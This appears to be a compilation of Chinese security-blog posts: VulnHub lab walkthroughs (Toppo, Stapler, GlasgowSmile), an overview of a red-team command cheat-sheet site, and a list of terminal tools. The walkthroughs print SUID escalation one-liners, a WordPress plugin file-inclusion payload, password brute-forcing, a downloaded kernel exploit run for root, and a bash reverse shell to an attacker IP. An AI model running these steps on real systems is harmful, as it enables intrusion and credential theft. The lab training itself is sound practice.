Vulnhub-Toppo靶机，python、awk的SUID提权，两种提权方式 vulnhub-Toppo靶机，SUID提权这个靶机主要是SUID提权，相对简单，靶机下载：官网链接：https://download.vulnhub.com/toppo/Toppo.zip使用nmap和dirb进行web打点nmap -sS 10.10.10.222 -p- -A -T4dirsearch -u http://10.10.10.222/web识别，是一个普通的html页面whatweb http://10.10.10.222/发现了一个密码信息 12345ted123我们猜测账号就是那串密码夹着中间的英文ted登录成功之后就是内网渗透，我们使用FeatherScan进行内网信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan_v4_5_python -m http.server​# 靶机wget 10.10.10.130:8000/FeatherScan_v4_5wget 10.10.10.130:8000/feather_vuln_db.txtchmod +x FeatherScan_v4_5./FeatherScan_v4_5发现提权漏洞得到两个提权向量，两个命令都可以用awk 'BEGIN {system("/bin/sh")}'python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换至此提权成功！很简单吧

VulnHub-STAPLER: 1 内核&sudo提权 靶机地址：https://www.vulnhub.com/entry/stapler-1,150/靶机描述：Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开，或者导致网络错误我们在端口扫描的时候，就能看到ftp是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务，也就是80端口进行目录扫描curl http://10.10.10.220/.profilecurl http://10.10.10.220/.bashrc使用上面的命令可以看到这些内容（没有什么东西）接下来我们使用ftp匿名登录有一个note笔记，把它get下来查看┌──(root㉿kali)-[~]└─# ftp 10.10.10.220Connected to 10.10.10.220.220-220-|-----------------------------------------------------------------------------------------|220-| Harry, make sure to update the banner when you get a chance to show who has access here |220-|-----------------------------------------------------------------------------------------|220-220Name (10.10.10.220:kali): ftp331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls550 Permission denied.200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r--    1 0        0             107 Jun 03  2016 note226 Directory send OK.ftp> cd note550 Failed to change directory.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r--    1 0        0             107 Jun 03  2016 note226 Directory send OK.ftp> get notelocal: note remote: note200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note (107 bytes).100% |*********************|   107        1.03 MiB/s    00:00 ETA226 Transfer complete.107 bytes received in 00:00 (110.69 KiB/s)ftp> exit221 Goodbye.​┌──(root㉿kali)-[~]└─# cat note # 查看noteElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息，我们来到12380端口的web，他报了一个400，使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin，但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息 这样子找找phpmyadmin的nday（利用过几个之后也没什么作用）我们打开目录扫描出来的robobts.txt，包含了两个目录，一个是后台界面的目录，一个是博客地址访问后台，缺弹出了一个框，看这个样子应该是被别人黑过，留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan，枚举可能存在的用户并使用这些用户名对后台进行爆破，使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:footballharry:monkeyscott:cookietim:thumb登录后台第一篇文章第二篇文章，还有第三篇文章，都没有什么用我们访问wordpress插件的目录（dirb，dirsearch都能扫出来）可以看到有三个插件来看第一个插件，他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞，额外找到了突破点我们尝试运行这个exp，报了一些错误，显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令，平时我也不怎么用，-i参数表示的是直接修改这个文件，由于url中包含了很多个/所以就换了个符号|进行分割，不然也可以使用/，s表示替换命令，最后面那个g表示全局替换，使用示例sed -i 's/原内容/新内容/g' # / 写法sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题，ssl错误，我们的靶机站点ssl错误了，不清楚怎么修改代码不要紧，我们使用他提供的poc手工打（这个漏洞脚本中有）下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url，但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址，显示了一个页面不存在的样子随后我找了半天，尝试了各种操作，在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码root : plbkac，原来访问了那个文件包含的poc，在这里会生成几张图片，二这个图片的内容就是你包含的文件的内容！curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库，目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试（同样使用文件包含漏洞，获取/etc/passwd文件内容），下面是可能的用户┌──(root㉿kali)-[/data/demo]└─# cat user.txtsyncpeterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumMFreiSStroudCCeaserJKanodeCJooJLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwelly使用这些用户，还有数据库的密码，进行爆破（猜测数据库密码是其中任意一个用户的名字）使用ssh进行登录使用featherscan，进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan/FeatherScan_v4_5_/chmod +x FeatherScan_v4_5./FeatherScan_v4_5发现了如下漏洞信息，如果仔细辨别名称的话，这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞，毕竟工具不能代替人工，随后找到了这个exp最后面有一个exp，我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip​zoe@red:/tmp$ ls39772.zip FeatherScan searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ unzip 39772.zipArchive:  39772.zip  creating: 39772/inflating: 39772/.DS_Store  creating: __MACOSX/  creating: __MACOSX/39772/inflating: __MACOSX/39772/._.DS_Storeinflating: 39772/crasher.tarinflating: __MACOSX/39772/._crasher.tarinflating: 39772/exploit.tarinflating: __MACOSX/39772/._exploit.tarzoe@red:/tmp$ ls39772  39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ cd 39772zoe@red:/tmp/39772$ lscrasher.tar exploit.tarzoe@red:/tmp/39772$ tar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.czoe@red:/tmp/39772$ lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tarzoe@red:/tmp/39772$ cd eebpf_mapfd_doubleput_exploit/ exploit.tarzoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput.c hello.c suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./compile.shdoubleput.c: In function ‘make_setuid’:doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]  .insns = (__aligned_u64) insns,            ^doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]  .license = (__aligned_u64)""  # 这里报错不要紧，不影响脚本正常编译              ^zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.whoami​suid file detected, launching rootshell...we have root privs now...root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiroot至此提权成功！其他思路，在home下面发现了一个sudo用户peter，而且能够使用sudo查看历史命令，发现了另外两个用户的密码，其中包含了peter！能使用sudo！那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost有了密码，使用sudo的时候发现sudo权限是all，那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你，致敬~往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

红队命令速查手册 站点：https://book.shentoushi.top/核心作用：这个站点的核心目标是解决红队行动和渗透测试过程中面临的“命令记忆痛点”，充当一个集中化的、快速查询的实战命令速查手册。它将自己定位为安全从业者（尤其是红队成员）的“技术备忘录”和“效率工具”。功能详解：命令的全面整合与分类：站点最显著的功能是将红队渗透中常用的、零散的命令进行了系统性的收集和分类。这涵盖了：操作系统基础命令：明确区分Win命令(Windows) 和Linux命令，这是渗透工作的底层基础。核心安全工具指令：专门整理了wmic,powershell,mimikatz（及其相关变种），Metasploit（框架及其常用模块），cobalt strike（及其相关工具）等重量级工具的常用命令和操作语法。掌握这些工具的命令是红队工作的核心技能。专项技术领域命令：隧道代理 (隧道代理工具):整理用于端口转发、代理、内网穿透等场景的工具命令。Web渗透 (Web渗透技巧):包含针对 Web 应用的常见攻击手段和工具命令。内网渗透 (内网渗透):细分为信息收集 (Information)、横向移动 (Win/Linux_LateralMovement)、以及利用impacket工具集进行内网渗透的命令。LOLBins (Lolbin介绍):收集利用 Windows (Win_Lolbin) 和 Linux (Linux_Lolbin) 系统自带合法程序 (Living-off-the-Land Binaries) 进行攻击或绕过检测的技巧与命令组合。凭证提取 (Credential介绍):专门章节讲解如dump_lsass和dump_lsa等关键凭证提取技术的命令和方法。权限提升 (Privilege介绍):整理系统提权 (Privilege_Escalation) 的常用命令和技巧。数据库操作 (数据库命令):覆盖主流数据库 (Mssql,Mysql,Oracle,PostgreSql,Redis) 在渗透中常用的连接、查询、命令执行等语句。编程相关 (编程常用命令):提供Go,Nim,Rust,Python等红队常用开发或利用语言的代码片段或编译命令 (Go,Nim,RustCode,PythonCode)。反病毒规避 (Anti Virus介绍):提供针对常见安全产品（如Kaspersky,Defender,Avast,SangforEDR,Asiainfo,Dbappsecurity,Skylar,HipsTray）的规避技巧或相关命令参考（虽然可能不是直接的绕过命令，但包含相关上下文）。结构清晰，便于速查：网站采用层级目录结构（如“系统命令 > Win命令收集”），逻辑清晰。用户可以根据当前的操作环境（Windows/Linux）、使用的工具（Metasploit/Cobalt Strike）、执行的任务（信息收集/横向移动/提权/凭证窃取）或针对的目标（数据库/特定 AV）快速导航到对应的命令集合。顶部的“手册 (手册)”部分进一步提炼了渗透常用命令，可能是最精华、最高频命令的快速索引。聚焦实战，解决实际问题：其内容直接来源于红队实践中积累的需求。整合系统命令、工具命令、专项技术命令的目的，就是为了让安全工程师在紧张的渗透测试或红队演练中，能快速找到并验证需要执行的命令，避免因记忆模糊或查找资料浪费时间，甚至出错。例如，忘记某个特定的mimikatz参数或一个用于数据库提权的特定 SQL 查询，都可以在这里查找。作为知识库的补充 (Wiki)：关联的 Wiki (https://wiki.shentoushi.top/) 表明该站点可能是一个更广泛知识体系的一部分。主站点 (book.shentoushi.top) 专注于命令速查，而 Wiki 可能承载更深入的技术原理、战术讲解、工具分析或开源项目 (github安全开源项目) 的详细文档。总结：RedTeam And Command(https://book.shentoushi.top) 是一个高度实用主义导向的网站。它不做冗长的理论阐述，而是将红队和渗透测试人员在日常工作中最常需要、最容易遗忘的各种系统命令、工具指令、专项技术操作语句进行了系统化的归类和呈现。它本质上是一个为提升安全工程师操作效率而生的“红队实战命令速查字典”和“专项技术命令手册”，其价值在于让用户能快速定位并准确执行所需的命令，从而更流畅地完成复杂的渗透任务。关联的 Wiki 站点则可能提供更深层次的技术背景支持。往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

VulnHub--GlasgowSmile-v1.1 靶机地址：https://www.vulnhub.com/entry/glasgow-smile-11,491/首先对目标地址进行端口扫描访问80界面来看看插件的内容以及dirb目录扫描的结果，这里发现了一个joomla的cms内容管理系统我们使用joomscan进行目录扫描joomscan --url http://10.10.10.129/joomla版本指纹为 Joomla 3.7.3rc1尝试一顿操作后，都登录不进去，找exp也没有，那么就来爆破后台地址http://10.10.10.129/joomla/administrator普通密码字典爆破失败后我又试着将index.php中的信息用cewl做成字典进行尝试cewl http://10.10.10.129/joomla > dict1.txt继续打开burp抓包，尝试admin进行爆破添加字典没有结果这里要使用这个默认的用户joomla此时的密码就爆破成功了来到后台的管理我们找到已启动的主题这里修改配置文件，为反弹shell的php（kali自带的）之后访问主页就能反弹成功了我们使用FeatherScanwget 10.10.10.128:8000/FeatherScanchmod +x FeatherScan./FeatherScan检查敏感文件/etc/passwd、/etc/shadow都不可写，以及sudo命令都不可以使用通过FeatherScan linux内网扫描工具扫描出来可能存在脏牛提权漏洞尝试一下是失败的，看样子是已经修复了的切换思路，我们来到cms的配置文件可以看到密码就是Gotham（刚刚爆破出来的结果）mysql -ujoomla -pbabyjokeruse joomla_dbuse mysqlselect User,Password from user;找到了root的解密结果为babyjoker切换任意一个用户试试看样子都没有效果，我们换一个数据库看看use batjokeselect * from taskforce;很好找到了这些密码，全部记下来并解密（base64）Bane:baneishereAaron:aaronishereCarnage:carnageisherebuster:busterishereffrob:???AllIHaveAreNegativeThoughts???aunt:auntis the fuck here发现rob用户存在，切换用户成功找到第一个flag这里有一个abner用户的求救文件，看样子是一个加密文件，那么是什么加密呢，从一封信的角度来看，对内容做隐藏让我想到了ROT13https://btsrk.me/，打开这个站点，我们对这个结果进行解密翻译结果如下简单来说就是让我们解密这段base64加密的结果STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==┌──(root㉿kali)-[/data/demo]└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -dI33hope99my0death000makes44more8cents00than0my0life0解密成功后就切换到这个用户找到第二个flag，又有一个提示信息，但是没什么用前面信息收集都搜集的差不多了（FeatherScan），直到我查看到了他的历史命令包含了这样一个东西找到这个文件的位置，还要我们输入密码find / -name .dear_penguins.zip 2>/dev/null下载下来尝试爆破，用kali自带的字典一顿操作没有结果后，我使用了当前用户的密码进行猜测，就成功了abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp<r/manifests/files$ unzip .dear_penguins.zip -d /tmpArchive: .dear_penguins.zip[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0​inflating: /tmp/dear_penguins abner@glasgowsmile:/$ cd /tmpcd tmpabner@glasgowsmile:/tmp$ lslsdear_penguinsabner@glasgowsmile:/tmp$ cat dear_penguinscat dear_penguinsMy dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz就又看到一段密文scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz，再次切换用户试试在penguin用户中看到了一个find命令，且具有suid权限，很多人可能会想到find提权，但是这里可不是，下面看描述1、s（setuid 位）：表示该文件在执行时，会以文件所有者（penguin）的权限运行，而不是执行者的权限。2、这里的所有者是penguin，所以find运行时会有penguin的权限（不是root）。我们来看下面这个文件，也是一个可执行文件，查看内容竟然是一个可执行sh脚本开始修改penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#/bin/sh'#/bin/shpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#!/bin/bash' > .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1' >> .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old#!/bin/bash/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ./.trash_old​到此提权成功往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

12款优秀的终端工具推荐，来看看有没有你喜欢的！ edex-ui开源地址：https://github.com/GitSquared/edex-uieDEX-UI 可以安装在Linux、Windows、MacOS操作系统上面。受电影《创战记》的特效启发，尤其是会议室的场景，给咱带来的灵感超棒！eDEX-UI项目一开始就想搞点特别的，就是“少点艺术味儿，多点实用软件的dx-ui”。不过，这项目虽然看着有未来主义那味儿，但也没光顾着好看，它还很实在地想着得有点功能性，在咱们日常生活中能用得上。说白了，它就是想把科幻小说里的用户体验（UXs）拉到咱普通人身边，让这些高科技玩意儿走进主流生活。Windows Terminal下载地址：微软商店（Microsoft Store）以前在 Windows 系统里，自带的 CMD 工具真是难用得很，模样也不好看，跟 Linux、Mac 那又好看又好用的终端一对比，差距太大了，所以很多人都得额外装第三方工具来替代它。到了 2022 年，微软终于搞出个好东西，推出了一款超厉害的新终端——Windows Terminal。这玩意儿功能超多，有那种透亮的亚克力效果，能开好多标签页，还支持 Unicode 字符和自带的等宽字体，甚至能跑一些 Linux 命令，基本日常用它就足够了。想装的话超简单，打开 Microsoft Store 一搜，点安装就行。PowerShellPowerShell 也是 Windows 的一个终端工具，通过一些配置和工具也能达到美观和实用的效果。参考：谁的能拒绝这样一款终端呢？XShellXShell 是一款超好用的终端工具，特别受欢迎，由 NetSarang 公司开发，自夸说是业界数一数二的 SSH 客户端。官网是https://www.xshell.com/zh/xshell，学生和非商业用途的个人可以免费用，直接去官网下载就行。这公司还有不少配套工具，像 STP、FTP 这些，也都挺好用的。Fluent TerminalFluent Terminal 是Windows平台上的一个超好看的终端模拟器，是用UWP技术开发的，颜值爆表。它在GitHub上是开源的，地址是https://github.com/felixse/FluentTerminal，大家都能去看。同时，你也可以直接在Microsoft Store里搜索它的名字来安装，超级方便。HyperHyper 是个基于 Electron 的跨平台终端应用，配置方便，插件多，界面也很漂亮。不过，Electron 应用普遍存在的问题是资源消耗较大，打开和响应速度不如之前介绍的那些工具快。但它的扩展性很强，有强大的自定义能力，值得尝试。它在 GitHub 上开源，链接是：https://github.com/zeit/hyper。Cmder在 Windows Terminal 推出前，Cmder 可以说是 cmd 的不错替代品，非常受欢迎。它有更友好的界面和更丰富的功能，还内置了 Git，支持部分 Linux 命令。官网是cmder.app，同时也在 GitHub 上开源，链接是：https://github.com/cmderdev/cmder。TabbyTabby（以前叫 Terminus）是一个很厉害的终端模拟器，也是 SSH 和串行客户端，Windows、macOS 和 Linux 系统都能用。它基于 Electron 开发，原生支持 Windows 的 Fluent 背景，设置都是通过 GUI，对用户很友好。官网是https://tabby.sh/，在 GitHub 上开源，链接是：https://github.com/eugeny/tabby。总之，Tabby 是个很值得尝试的终端工具。WindTermWindTerm 是一款专业的跨平台开源终端，支持 SSH、Sftp、Shell、Telnet 和 Serial，用 C 语言编写。它完全免费，可用于商业和非商业用途，没有限制，源代码在 Apache-2.0 许可下提供。感兴趣的朋友可以访问它的GitHub页面：https://github.com/kingToolbox/WindTerm。作者也在博客https://kingtoolbox.github.io/上分享了不少关于 WindTerm 的文章，大家可以去看看。Wrap一款颜值和功能都很在线的终端工具。官网：https://www.warp.dev开源在 GitHub：https://github.com/warpdotdev/Warpsshx一款可以将你的终端共享的工具。开源在 GitHub：https://github.com/ekzhang/sshxIShelliShell 的官网是https://www.ishell.cc/。它的特点包括：有 AI 助力，不用担心忘记命令。有免费版和付费版，免费版能永久使用。轻量、高性能，界面简洁美观，还自带本地终端。跨平台，支持 Windows、macOS 和 Linux，安卓和 iOS 版本正在开发中。有命令市场，用户可以上传通用脚本，避免重复编写，可直接下载使用。总结工具是刀，怂逼拿再帅的刀也切不动菜！要么沉下心学命令行本质，要么老实蹲回GUI婴儿区喝奶——别™在技术圈当截图行为艺术家！（摔键盘走人） -------deepseek往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具HW 中如何利用 WAF 缺陷进行绕过一个永久的渗透知识库【内网渗透】隐藏通信隧道技术Sqlserver SQL注入，超详细【oscp】WEBDEVELOPER，tcpdump提权红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学